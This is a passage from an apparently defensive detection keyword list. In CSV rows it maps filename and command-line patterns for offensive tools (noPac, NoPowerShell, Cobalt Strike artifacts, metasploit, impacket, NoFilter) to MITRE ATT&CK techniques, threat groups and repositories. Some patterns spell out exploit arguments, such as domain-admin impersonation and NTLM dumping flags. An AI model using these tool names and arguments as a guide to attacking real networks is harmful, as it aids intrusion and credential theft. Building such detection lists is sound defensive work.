- T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*nmap-*-setup.exe*,greyware_tool_keyword,nmap,When Nmap is used on Windows systems. it can perform various types of scans such as TCP SYN scans. UDP scans. and service/version detection. These scans enable the identification of open ports. services running on those ports. and potential vulnerabilities in target systems.,T1046 - T1065 - T1210.002,TA0002 - TA0007 - TA0008,N/A,N/A,Reconnaissance,N/A,1,0,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*nmap/ncrack*,offensive_tool_keyword,ncrack,High-speed network authentication cracking tool.,T1110.001 - T1110.002 - T1110.003,TA0006 - TA0007 - TA0009,N/A,N/A,Credential Access,https://github.com/nmap/ncrack,1,1,N/A,N/A,10,972,238,2023-02-22T21:33:24Z,2015-12-21T23:48:00Z -*nmap_smb_scan_custom_*.txt*,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,1,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -*nmapAnswerMachine.py*,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/fortra/impacket,1,1,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -*nmap-elasticsearch-nse*,greyware_tool_keyword,nmap,Install and update external NSE script for nmap,T1046 - T1059.001 - T1027.002,TA0007 - TA0005,N/A,N/A,Vulnerability Scanner,https://github.com/shadawck/nse-install,1,0,N/A,7,1,3,1,2020-08-28T11:27:08Z,2020-08-24T16:55:55Z -*nmap-reverse-lookup*,offensive_tool_keyword,thoth,Automate recon for red team assessments.,T1190 - T1083 - T1018,TA0007 - TA0043 - TA0001,N/A,N/A,Reconnaissance,https://github.com/r1cksec/thoth,1,0,N/A,7,1,75,8,2023-09-27T06:46:46Z,2021-11-15T13:40:56Z -*nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA4pz*,offensive_tool_keyword,CloakNDaggerC2,A C2 framework designed around the use of public/private RSA key pairs to sign and authenticate commands being executed. This prevents MiTM interception of calls and ensures opsec during delicate operations.,T1090 - T1090.003 - T1071 - T1071.001 - T1553 - T1553.002,TA0011 - TA0042 - TA0003,N/A,N/A,C2,https://github.com/matt-culbert/CloakNDaggerC2,1,0,N/A,10,10,4,2,2023-10-02T19:54:24Z,2023-04-28T01:58:18Z -*no Mimik@tz - loaded successfully*,offensive_tool_keyword,PowerSharpPack,Many useful offensive CSharp Projects wraped into Powershell for easy usage,T1059.001 - T1027 - T1055.012,TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/S3cur3Th1sSh1t/PowerSharpPack,1,0,N/A,10,10,1257,284,2023-03-01T17:10:43Z,2020-04-06T16:34:52Z -*no_session_payload.rb*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*NoApiUser.exe*,offensive_tool_keyword,cobaltstrike,Use windows api to add users which can be used when net is unavailable,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/lengjibo/NetUser,1,1,N/A,10,10,410,90,2021-09-29T14:22:09Z,2020-01-09T08:33:27Z -*noclient: failed to execute %s: %s*,offensive_tool_keyword,EQGRP tools,Equation Group hack tool leaked by ShadowBrokers- file noclient CNC server for NOPEN*,T1053 - T1064 - T1059 - T1218,TA0002 - TA0007,N/A,N/A,Shell spawning,https://github.com/x0rz/EQGRP/blob/master/Linux/bin/noclient-3.3.2.3-linux-i386,1,0,N/A,N/A,10,4011,2166,2017-05-24T21:12:59Z,2017-04-08T14:03:59Z -*node stealer.js *,offensive_tool_keyword,cuddlephish,Weaponized Browser-in-the-Middle (BitM) for Penetration Testers,T1185 - T1185.002 - T1071 - T1071.001 - T1556 - T1556.001,TA0009 - TA0006,N/A,N/A,Sniffing & Spoofing,https://github.com/fkasler/cuddlephish,1,0,N/A,10,2,152,10,2023-09-06T12:25:08Z,2023-08-02T14:30:41Z -*NoFault\NoFault.*,offensive_tool_keyword,PPLFault,Exploits a TOCTOU in Windows Code Integrity to achieve arbitrary code execution as WinTcb-Light then dump a specified process.,T1055 - T1078 - T1112 - T1553 - T1555,TA0001 - TA0002 - TA0003 - TA0005 - TA0011,N/A,N/A,Credential Access,https://github.com/gabriellandau/PPLFault,1,0,N/A,N/A,5,410,66,2023-10-03T20:00:34Z,2022-09-22T19:39:24Z -*NoFilter.exe *,offensive_tool_keyword,NoFilter,Tool for abusing the Windows Filtering Platform for privilege escalation. It can launch a new console as NT AUTHORITY\SYSTEM or as another user that is logged on to the machine.,T1548 - T1548.002 - T1055 - T1055.004,TA0004 - TA0003,N/A,N/A,Privilege Escalation,https://github.com/deepinstinct/NoFilter,1,0,N/A,9,3,257,42,2023-08-20T07:12:01Z,2023-07-30T09:25:38Z -*NoFilter-main.zip*,offensive_tool_keyword,NoFilter,Tool for abusing the Windows Filtering Platform for privilege escalation. It can launch a new console as NT AUTHORITY\SYSTEM or as another user that is logged on to the machine.,T1548 - T1548.002 - T1055 - T1055.004,TA0004 - TA0003,N/A,N/A,Privilege Escalation,https://github.com/deepinstinct/NoFilter,1,1,N/A,9,3,257,42,2023-08-20T07:12:01Z,2023-07-30T09:25:38Z -*nop_shellcode.bin*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*noPac * -dc-ip * --impersonate *,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*noPac.* -create-child*,offensive_tool_keyword,POC,POC exploitation for CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user,T1548 - T1134 - T1078 - T1078.002,TA0004 ,N/A,N/A,Exploitation tools,https://github.com/Ridter/noPac,1,0,N/A,N/A,7,643,112,2023-01-29T03:31:27Z,2021-12-13T10:28:12Z -*noPac.* -dc-host *,offensive_tool_keyword,POC,POC exploitation for CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user,T1548 - T1134 - T1078 - T1078.002,TA0004 ,N/A,N/A,Exploitation tools,https://github.com/Ridter/noPac,1,0,N/A,N/A,7,643,112,2023-01-29T03:31:27Z,2021-12-13T10:28:12Z -*noPac.* -dc-ip *,offensive_tool_keyword,POC,POC exploitation for CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user,T1548 - T1134 - T1078 - T1078.002,TA0004 ,N/A,N/A,Exploitation tools,https://github.com/Ridter/noPac,1,0,N/A,N/A,7,643,112,2023-01-29T03:31:27Z,2021-12-13T10:28:12Z -*noPac.* -domain-netbios*,offensive_tool_keyword,POC,POC exploitation for CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user,T1548 - T1134 - T1078 - T1078.002,TA0004 ,N/A,N/A,Exploitation tools,https://github.com/Ridter/noPac,1,0,N/A,N/A,7,643,112,2023-01-29T03:31:27Z,2021-12-13T10:28:12Z -*noPac.* -dump*,offensive_tool_keyword,POC,POC exploitation for CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user,T1548 - T1134 - T1078 - T1078.002,TA0004 ,N/A,N/A,Exploitation tools,https://github.com/Ridter/noPac,1,0,N/A,N/A,7,643,112,2023-01-29T03:31:27Z,2021-12-13T10:28:12Z -*noPac.* -hashes *,offensive_tool_keyword,POC,POC exploitation for CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user,T1548 - T1134 - T1078 - T1078.002,TA0004 ,N/A,N/A,Exploitation tools,https://github.com/Ridter/noPac,1,0,N/A,N/A,7,643,112,2023-01-29T03:31:27Z,2021-12-13T10:28:12Z -*noPac.* --impersonate *,offensive_tool_keyword,POC,POC exploitation for CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user,T1548 - T1134 - T1078 - T1078.002,TA0004 ,N/A,N/A,Exploitation tools,https://github.com/Ridter/noPac,1,0,N/A,N/A,7,643,112,2023-01-29T03:31:27Z,2021-12-13T10:28:12Z -*noPac.* -just-dc-ntlm*,offensive_tool_keyword,POC,POC exploitation for CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user,T1548 - T1134 - T1078 - T1078.002,TA0004 ,N/A,N/A,Exploitation tools,https://github.com/Ridter/noPac,1,0,N/A,N/A,7,643,112,2023-01-29T03:31:27Z,2021-12-13T10:28:12Z -*noPac.* -just-dc-user *,offensive_tool_keyword,POC,POC exploitation for CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user,T1548 - T1134 - T1078 - T1078.002,TA0004 ,N/A,N/A,Exploitation tools,https://github.com/Ridter/noPac,1,0,N/A,N/A,7,643,112,2023-01-29T03:31:27Z,2021-12-13T10:28:12Z -*noPac.* -new-name *,offensive_tool_keyword,POC,POC exploitation for CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user,T1548 - T1134 - T1078 - T1078.002,TA0004 ,N/A,N/A,Exploitation tools,https://github.com/Ridter/noPac,1,0,N/A,N/A,7,643,112,2023-01-29T03:31:27Z,2021-12-13T10:28:12Z -*noPac.* -no-add *,offensive_tool_keyword,POC,POC exploitation for CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user,T1548 - T1134 - T1078 - T1078.002,TA0004 ,N/A,N/A,Exploitation tools,https://github.com/Ridter/noPac,1,0,N/A,N/A,7,643,112,2023-01-29T03:31:27Z,2021-12-13T10:28:12Z -*noPac.* -pwd-last-set*,offensive_tool_keyword,POC,POC exploitation for CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user,T1548 - T1134 - T1078 - T1078.002,TA0004 ,N/A,N/A,Exploitation tools,https://github.com/Ridter/noPac,1,0,N/A,N/A,7,643,112,2023-01-29T03:31:27Z,2021-12-13T10:28:12Z -*noPac.* -service-name *,offensive_tool_keyword,POC,POC exploitation for CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user,T1548 - T1134 - T1078 - T1078.002,TA0004 ,N/A,N/A,Exploitation tools,https://github.com/Ridter/noPac,1,0,N/A,N/A,7,643,112,2023-01-29T03:31:27Z,2021-12-13T10:28:12Z -*noPac.* -shell*,offensive_tool_keyword,POC,POC exploitation for CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user,T1548 - T1134 - T1078 - T1078.002,TA0004 ,N/A,N/A,Exploitation tools,https://github.com/Ridter/noPac,1,0,N/A,N/A,7,643,112,2023-01-29T03:31:27Z,2021-12-13T10:28:12Z -*noPac.* -shell-type *,offensive_tool_keyword,POC,POC exploitation for CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user,T1548 - T1134 - T1078 - T1078.002,TA0004 ,N/A,N/A,Exploitation tools,https://github.com/Ridter/noPac,1,0,N/A,N/A,7,643,112,2023-01-29T03:31:27Z,2021-12-13T10:28:12Z -*noPac.* -use-ldap*,offensive_tool_keyword,POC,POC exploitation for CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user,T1548 - T1134 - T1078 - T1078.002,TA0004 ,N/A,N/A,Exploitation tools,https://github.com/Ridter/noPac,1,0,N/A,N/A,7,643,112,2023-01-29T03:31:27Z,2021-12-13T10:28:12Z -*noPac.csproj*,offensive_tool_keyword,POC,POC exploitation for CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user,T1548 - T1134 - T1078 - T1078.002,TA0004 ,N/A,N/A,Exploitation tools,https://github.com/ricardojba/noPac,1,0,N/A,N/A,1,34,5,2021-12-19T17:42:12Z,2021-12-13T18:51:31Z -*noPac.csproj.AssemblyReference.cache*,offensive_tool_keyword,POC,POC exploitation for CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user,T1548 - T1134 - T1078 - T1078.002,TA0004 ,N/A,N/A,Exploitation tools,https://github.com/ricardojba/noPac,1,0,N/A,N/A,1,34,5,2021-12-19T17:42:12Z,2021-12-13T18:51:31Z -*noPac.py*,offensive_tool_keyword,POC,POC exploitation for CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user,T1548 - T1134 - T1078 - T1078.002,TA0004 ,N/A,N/A,Exploitation tools,https://github.com/Ridter/noPac,1,0,N/A,N/A,7,643,112,2023-01-29T03:31:27Z,2021-12-13T10:28:12Z -*noPac.sln*,offensive_tool_keyword,POC,POC exploitation for CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user,T1548 - T1134 - T1078 - T1078.002,TA0004 ,N/A,N/A,Exploitation tools,https://github.com/ricardojba/noPac,1,0,N/A,N/A,1,34,5,2021-12-19T17:42:12Z,2021-12-13T18:51:31Z -*NoPowerShell.cna*,offensive_tool_keyword,C2 related tools,PowerShell rebuilt in C# for Red Teaming purposes,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider - TA505 - Cobalt Group - DarkHydrus - APT41 - Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda - Indrik Spider,C2,https://github.com/bitsadmin/nopowershell,1,1,N/A,10,10,761,126,2021-06-17T12:36:05Z,2018-11-28T21:07:51Z -*NoPowerShell.cna*,offensive_tool_keyword,nopowershell,NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.,T1059 - T1086 - T1500 - T1564 - T1127 - T1027,TA0002 - TA0003 - TA0005,N/A,N/A,Defense Evasion,https://github.com/bitsadmin/nopowershell,1,1,N/A,10,10,761,126,2021-06-17T12:36:05Z,2018-11-28T21:07:51Z -*NoPowerShell.Commands*,offensive_tool_keyword,nopowershell,NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.,T1059 - T1086 - T1500 - T1564 - T1127 - T1027,TA0002 - TA0003 - TA0005,N/A,N/A,Defense Evasion,https://github.com/bitsadmin/nopowershell,1,0,N/A,10,10,761,126,2021-06-17T12:36:05Z,2018-11-28T21:07:51Z -*NoPowerShell.dll*,offensive_tool_keyword,C2 related tools,PowerShell rebuilt in C# for Red Teaming purposes,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider - TA505 - Cobalt Group - DarkHydrus - APT41 - Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda - Indrik Spider,C2,https://github.com/bitsadmin/nopowershell,1,1,N/A,10,10,761,126,2021-06-17T12:36:05Z,2018-11-28T21:07:51Z -*NoPowerShell.dll*,offensive_tool_keyword,nopowershell,NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.,T1059 - T1086 - T1500 - T1564 - T1127 - T1027,TA0002 - TA0003 - TA0005,N/A,N/A,Defense Evasion,https://github.com/bitsadmin/nopowershell,1,1,N/A,10,10,761,126,2021-06-17T12:36:05Z,2018-11-28T21:07:51Z -*nopowershell.exe*,offensive_tool_keyword,C2 related tools,PowerShell rebuilt in C# for Red Teaming purposes,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider - TA505 - Cobalt Group - DarkHydrus - APT41 - Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda - Indrik Spider,C2,https://github.com/bitsadmin/nopowershell,1,1,N/A,10,10,761,126,2021-06-17T12:36:05Z,2018-11-28T21:07:51Z -*NoPowerShell.exe*,offensive_tool_keyword,nopowershell,NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.,T1059 - T1086 - T1500 - T1564 - T1127 - T1027,TA0002 - TA0003 - TA0005,N/A,N/A,Defense Evasion,https://github.com/bitsadmin/nopowershell,1,1,N/A,10,10,761,126,2021-06-17T12:36:05Z,2018-11-28T21:07:51Z -*NoPowerShell.sln*,offensive_tool_keyword,nopowershell,NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.,T1059 - T1086 - T1500 - T1564 - T1127 - T1027,TA0002 - TA0003 - TA0005,N/A,N/A,Defense Evasion,https://github.com/bitsadmin/nopowershell,1,1,N/A,10,10,761,126,2021-06-17T12:36:05Z,2018-11-28T21:07:51Z -*NoPowerShell/*.cs*,offensive_tool_keyword,C2 related tools,PowerShell rebuilt in C# for Red Teaming purposes,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider - TA505 - Cobalt Group - DarkHydrus - APT41 - Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda - Indrik Spider,C2,https://github.com/bitsadmin/nopowershell,1,1,N/A,10,10,761,126,2021-06-17T12:36:05Z,2018-11-28T21:07:51Z -*NoPowerShell_trunk.zip*,offensive_tool_keyword,nopowershell,NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.,T1059 - T1086 - T1500 - T1564 - T1127 - T1027,TA0002 - TA0003 - TA0005,N/A,N/A,Defense Evasion,https://github.com/bitsadmin/nopowershell,1,1,N/A,10,10,761,126,2021-06-17T12:36:05Z,2018-11-28T21:07:51Z -*NoPowerShell32.dll*,offensive_tool_keyword,nopowershell,NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.,T1059 - T1086 - T1500 - T1564 - T1127 - T1027,TA0002 - TA0003 - TA0005,N/A,N/A,Defense Evasion,https://github.com/bitsadmin/nopowershell,1,1,N/A,10,10,761,126,2021-06-17T12:36:05Z,2018-11-28T21:07:51Z -*NoPowerShell64.dll*,offensive_tool_keyword,nopowershell,NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.,T1059 - T1086 - T1500 - T1564 - T1127 - T1027,TA0002 - TA0003 - TA0005,N/A,N/A,Defense Evasion,https://github.com/bitsadmin/nopowershell,1,1,N/A,10,10,761,126,2021-06-17T12:36:05Z,2018-11-28T21:07:51Z -*--no-promiscuous-mode*,greyware_tool_keyword,wireshark,Wireshark is a network protocol analyzer.,T1040 - T1052.001 - T1046,TA0001 - TA0002 - TA0007,N/A,N/A,Sniffing & Spoofing,https://www.wireshark.org/,1,0,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*normal/randomized.profile*,offensive_tool_keyword,cobaltstrike,Malleable C2 is a domain specific language to redefine indicators in Beacon's communication. This repository is a collection of Malleable C2 profiles that you may use. These profiles work with Cobalt Strike 3.x,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/rsmudge/Malleable-C2-Profiles,1,1,N/A,10,10,1362,429,2021-05-18T14:45:39Z,2014-07-14T15:02:42Z -*northdata-get-company-names *,offensive_tool_keyword,thoth,Automate recon for red team assessments.,T1190 - T1083 - T1018,TA0007 - TA0043 - TA0001,N/A,N/A,Reconnaissance,https://github.com/r1cksec/thoth,1,0,N/A,7,1,75,8,2023-09-27T06:46:46Z,2021-11-15T13:40:56Z -*noseyparker report --datastore *,offensive_tool_keyword,noseyparker,Nosey Parker is a command-line program that finds secrets and sensitive information in textual data and Git history.,T1583 - T1059.001 - T1059.003,TA0002 - TA0003 - TA0040,N/A,N/A,Credential Access,https://github.com/praetorian-inc/noseyparker,1,1,N/A,8,10,1169,56,2023-09-25T21:13:22Z,2022-11-08T23:09:17Z -*noseyparker scan --datastore *,offensive_tool_keyword,noseyparker,Nosey Parker is a command-line program that finds secrets and sensitive information in textual data and Git history.,T1583 - T1059.001 - T1059.003,TA0002 - TA0003 - TA0040,N/A,N/A,Credential Access,https://github.com/praetorian-inc/noseyparker,1,1,N/A,8,10,1169,56,2023-09-25T21:13:22Z,2022-11-08T23:09:17Z -*noseyparker summarize 